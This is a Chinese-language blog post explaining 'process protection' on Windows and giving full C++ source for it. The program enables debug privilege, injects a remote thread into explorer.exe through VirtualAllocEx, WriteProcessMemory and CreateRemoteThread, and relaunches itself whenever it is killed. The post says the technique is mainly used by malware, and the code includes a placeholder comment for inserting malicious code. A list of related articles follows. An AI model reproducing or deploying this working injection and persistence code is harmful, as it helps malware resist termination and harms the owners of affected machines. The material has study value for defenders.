简介

所谓进程守护,就是A进程为了保护自己不被结束,创建了一个守护线程来保护自己,一旦被结束进程,便重新启动。进程守护的方法多被应用于恶意软件,是一个保护自己进程的一个简单方式,在ring3下即可轻松实现。而创建守护线程的方法多采用远程线程注入的方式,笔者之前曾介绍过远程线程注入的基本方式,主要分为[DLL远程注入](https://www.cnblogs.com/PeterZ1997/p/9532051.html)和[无DLL远程注入](https://www.cnblogs.com/PeterZ1997/p/9532065.html)。

代码实现

//////////////////////////////////////////////////////////////////

//

// FileName : ProcessProtectorDemo.cpp

// Creator : PeterZheng

// Date : 2018/9/06 17:32

// Comment : Process Protector

//

//////////////////////////////////////////////////////////////////

#pragma once

#include <cstdio>

#include <iostream>

#include <cstdlib>

#include <string.h>

#include <string>

#include <strsafe.h>

#include <Windows.h>

#include <tlhelp32.h>

#include <vector>

using namespace std;

#define MAX_LENGTH 255

#pragma warning(disable:4996)

//远程线程参数结构体

typedef struct _remoteTdParams

{

	LPVOID ZWinExec;             // WinExec Function Address

	LPVOID ZOpenProcess;         // OpenProcess Function Address

	LPVOID ZWaitForSingleObject; // WaitForSingleObject Function Address

	DWORD ZPid;                  // Param => Process id

	HANDLE ZProcessHandle;       // Param => Handle

	CHAR filePath[MAX_LENGTH];   // Param => File Path

}RemoteParam;

//本地线程参数结构体

typedef struct _localTdParams

{

	CHAR remoteProcName[MAX_LENGTH];

	DWORD localPid;

	DWORD remotePid;

	HANDLE hRemoteThread;

}LocalParam;

//字符串分割函数

BOOL SplitString(const string& s, vector<string>& v, const string& c)

{

	string::size_type pos1, pos2;

	pos2 = s.find(c);

	pos1 = 0;

	while (string::npos != pos2)

	{

		v.push_back(s.substr(pos1, pos2 - pos1));

		pos1 = pos2 + c.size();

		pos2 = s.find(c, pos1);

	}

	if (pos1 != s.length())

		v.push_back(s.substr(pos1));

	return TRUE;

}

//远程线程函数体 (守护函数)

DWORD WINAPI ThreadProc(RemoteParam *lprp)

{

	typedef UINT(WINAPI *ZWinExec)(LPCSTR lpCmdLine, UINT uCmdShow);

	typedef HANDLE(WINAPI *ZOpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);

	typedef DWORD(WINAPI *ZWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);

	ZWinExec ZWE;

	ZOpenProcess ZOP;

	ZWaitForSingleObject ZWFSO;

	ZWE = (ZWinExec)lprp->ZWinExec;

	ZOP = (ZOpenProcess)lprp->ZOpenProcess;

	ZWFSO = (ZWaitForSingleObject)lprp->ZWaitForSingleObject;

	lprp->ZProcessHandle = ZOP(PROCESS_ALL_ACCESS, FALSE, lprp->ZPid);

	ZWFSO(lprp->ZProcessHandle, INFINITE);

	ZWE(lprp->filePath, SW_SHOW);

	return 0;

}

//获取PID

DWORD __cdecl GetProcessID(CHAR *ProcessName)

{

	PROCESSENTRY32 pe32;

	pe32.dwSize = sizeof(pe32);

	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	if (hProcessSnap == INVALID_HANDLE_VALUE) return 0;

	BOOL bProcess = Process32First(hProcessSnap, &pe32);

	while (bProcess)

	{

		if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)

			return pe32.th32ProcessID;

		bProcess = Process32Next(hProcessSnap, &pe32);

	}

	CloseHandle(hProcessSnap);

	return 0;

}

//获取权限

int __cdecl EnableDebugPriv(const TCHAR *name)

{

	HANDLE hToken;

	TOKEN_PRIVILEGES tp;

	LUID luid;

	if (!OpenProcessToken(GetCurrentProcess(),

		TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,

		&hToken)) return 1;

	if (!LookupPrivilegeValue(NULL, name, &luid)) return 1;

	tp.PrivilegeCount = 1;

	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	tp.Privileges[0].Luid = luid;

	if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return 1;

	return 0;

}

//线程注入函数

BOOL __cdecl InjectProcess(const DWORD dwRemotePid, const DWORD dwLocalPid, HANDLE& hThread)

{

	if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;

	HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemotePid);

	if (!hWnd) return FALSE;

	RemoteParam rp;

	ZeroMemory(&rp, sizeof(RemoteParam));

	rp.ZOpenProcess = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "OpenProcess");

	rp.ZWinExec = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "WinExec");

	rp.ZWaitForSingleObject = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "WaitForSingleObject");

	rp.ZPid = dwLocalPid;

	CHAR szPath[MAX_LENGTH] = "\0";

	GetModuleFileName(NULL, szPath, sizeof(szPath));

	StringCchCopy(rp.filePath, sizeof(rp.filePath), szPath);

	RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	if (!pRemoteParam) return FALSE;

	if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;

	LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	if (!pRemoteThread) return FALSE;

	if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;

	hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);

	if (!hThread) return FALSE;

	return TRUE;

}

//远程线程监控函数(本地线程函数)

DWORD WINAPI WatchFuncData(LPVOID lprarm)

{

	HANDLE hRemoteThread = ((LocalParam*)lprarm)->hRemoteThread;

	DWORD dwLocalPid = ((LocalParam*)lprarm)->localPid;

	DWORD dwRemotePid = ((LocalParam*)lprarm)->remotePid;

	CHAR szRemoteProcName[MAX_LENGTH] = "\0";

	StringCchCopy(szRemoteProcName, sizeof(szRemoteProcName), ((LocalParam*)lprarm)->remoteProcName);

	DWORD exitCode = 0;

	while (TRUE)

	{

		if (!hRemoteThread) InjectProcess(dwRemotePid, dwLocalPid, hRemoteThread);

		GetExitCodeThread(hRemoteThread, &exitCode);

		if (exitCode^STILL_ACTIVE)

		{

			WinExec(szRemoteProcName, SW_HIDE);

			dwRemotePid = GetProcessID(szRemoteProcName);

			InjectProcess(dwRemotePid, dwLocalPid, hRemoteThread);

		}

		Sleep(1000);

	}

	return 0;

}

//主函数

int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)

{

	LocalParam lpLp;

	ZeroMemory(&lpLp, sizeof(LocalParam));

	CHAR szRemoteProcName[MAX_LENGTH] = "\0";

	CHAR szLocalProcName[MAX_LENGTH] = "\0";

	CHAR currentFilePath[MAX_LENGTH] = "\0";

	vector<string> pathGroup;

	GetModuleFileName(NULL, currentFilePath, sizeof(currentFilePath));

	SplitString(currentFilePath, pathGroup, "\\");

	StringCchCopy(szLocalProcName, sizeof(szLocalProcName), pathGroup[pathGroup.size() - 1].c_str());

	StringCchCopy(szRemoteProcName, sizeof(szRemoteProcName), "explorer.exe");

	StringCchCopy(szLocalProcName, sizeof(szLocalProcName), szLocalProcName);

	StringCchCopy(lpLp.remoteProcName, sizeof(lpLp.remoteProcName), szRemoteProcName);

	DWORD dwRemotePid = GetProcessID(szRemoteProcName);

	DWORD dwLocalPid = GetProcessID(szLocalProcName);

	HANDLE hThread = NULL;

	lpLp.remotePid = dwRemotePid;

	lpLp.localPid = dwLocalPid;

	hThread = CreateThread(NULL, 0, WatchFuncData, LPVOID(&lpLp), 0, 0);

	//....插入恶意代码等工作流程

	while (TRUE)

	{

		MessageBox(NULL, "Hello!!", "HAHA!! XDD", MB_OK);

	}

	WaitForSingleObject(hThread, INFINITE);

	return 0;

}

安全之路 —— C++实现进程守护的更多相关文章

  1. Android 保持Service不被Kill掉的方法--双Service守护 && Android实现双进程守护

    本文分为两个部分,第一部分为双Service守护,第二部分为双进程守护 第一部分: 一.Service简介:Java.lang.Object ↳Android.content.Context  ↳an ...

  2. Android实现双进程守护 (转)

    做过android开发的人应该都知道应用会在系统资源匮乏的情况下被系统杀死!当后台的应用被系统回收之后,如何重新恢复它呢?网上对此问题有很多的讨论.这里先总结一下网上流传的各种解决方案,看看这些办法是 ...

  3. 保持Service不被Kill掉的方法--双Service守护 && Android实现双进程守护

    本文分为两个部分,第一部分为双Service守护,第二部分为双进程守护 第一部分: 一.Service简介:Java.lang.Object ↳Android.content.Context  ↳an ...

  4. NodeJs之进程守护

    进程守护 由于nodejs的单线程的脆弱性,一旦遇到运行错误便会严重到退出node进程导致系统或应用瘫痪,所以pm2,forever出现了,帮助我们实现进程的重启,这只是他们的特性之一. 实例演示进程 ...

  5. Android NDK(C++) 双进程守护

    双进程守护如果从进程管理器观察会发现新浪微博.支付宝和QQ等都有两个以上相关进程,其中一个就是守护进程,由此可以猜到这些商业级的软件都采用了双进程守护的办法. 什么是双进程守护呢?顾名思义就是两个进程 ...

  6. Jexus进程守护工具jws.guard

    一个运行中的进程,难免会因为各种各样的原因无缘无故的宕掉(比如网站瞬间的负载过高.内存不足等),而Jexus宕掉的后果往往只有一个:对外提供服务的网站无法访问了.因此,我们需要最大限度的保障我们的网站 ...

  7. Python Twisted系列教程16:Twisted 进程守护

    作者:dave@http://krondo.com/twisted-daemonologie/  译者: Cheng Luo 你可以从”第一部分 Twist理论基础“开始阅读:也可以从”Twisted ...

  8. Android实现双进程守护

    做过android开发的人应该都知道应用会在系统资源匮乏的情况下被系统杀死!当后台的应用被系统回收之后,如何重新恢复它呢?网上对此问题有很多的讨论.这里先总结一下网上流传的各种解决方案,看看这些办法是 ...

  9. Window提高_3.1练习_双进程守护

    双进程守护 当打开一个进程A的时候,此进程检测是否存在进程B,如果不存在就创建进程B. 进程B的作用是检测进程A是否被关闭,如果被关闭了,就再创建一个进程A. 双进程守护A.exe代码如下: #inc ...

随机推荐

  1. Zabbix系列之六——添加web监测

    zabbix提供了web监测功能,监控到站点的响应时间,还可以根据站点返回的状态码,或者响应时间做报警,列入服务保证官网确打不开等现象. 官网地址:https://www.zabbix.com/doc ...

  2. Django | Cookie 中文编码的问题

    在Django中,向cookie写入中文字符后会报错:如向cookie中保存用户名,当用户名存在中文字符时: Traceback (most recent call last): File , in ...

  3. SQL 必知必会·笔记<12>组合查询

    什么是组合查询 SQL 通过执行多个查询(多条SELECT 语句),并将结果作为一个查询结果集返回.这些组合查询通常称为并(union)或复合查询(compound query). 什么时候使用组合查 ...

  4. 轻量级.NET CORE ORM框架Insql使用教程

    Insql 国人开发,是一款汲取 Mybatis 优点的.NET ORM 框架.追求简单直观,使用自由灵活等特点. 项目主页:https://rainrcn.github.io/insql 此 ORM ...

  5. Java设计模式学习记录-命令模式

    前言 这次要介绍的是命令模式,这也是一种行为型模式.最近反正没有面试机会我就写博客呗,该投的简历都投了.然后就继续看书,其实看书也会给自己带来成就感,原来以前不明白的东西,书上已经给彻底的介绍清楚了, ...

  6. FFmpeg使用基础

    本文为作者原创,转载请注明出处:https://www.cnblogs.com/leisure_chn/p/10297002.html 本文介绍FFmpeg最基础的概念,了解FFmpeg的简单使用,帮 ...

  7. Python和Java编程题(二)

    题目:古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少? 兔子的规律为数列1,1,2,3,5,8,13,21 ...

  8. “未能加载文件或程序集“XXX”或它的某一个依赖项。试图加载格式不正确的程序”问题的解决

    发布到win7 64位旗舰版iis上时,报:“未能加载文件或程序集“BC.Common”或它的某一个依赖项.试图加载格式不正确的程序”. 该DLL的本地复制没有设置为true(在项目引用里找到该引用, ...

  9. c# 获取客户端文件

    /// <summary> /// 获取有效客户端文件控件集合,文件控件必须上传了内容,为空将被忽略, /// 注意:Form标记必须加入属性 enctype="multipar ...

  10. 将javaWeb项目转maven项目

    不经常做此类转换,所以总是忘记转换方法,特此,记录下转换步骤 1.首先从SVN检出项目 2.找到导出项目路径 3.按住Shift+鼠标右键,打开控制台 3.输入命令mvn eclipse:eclips ...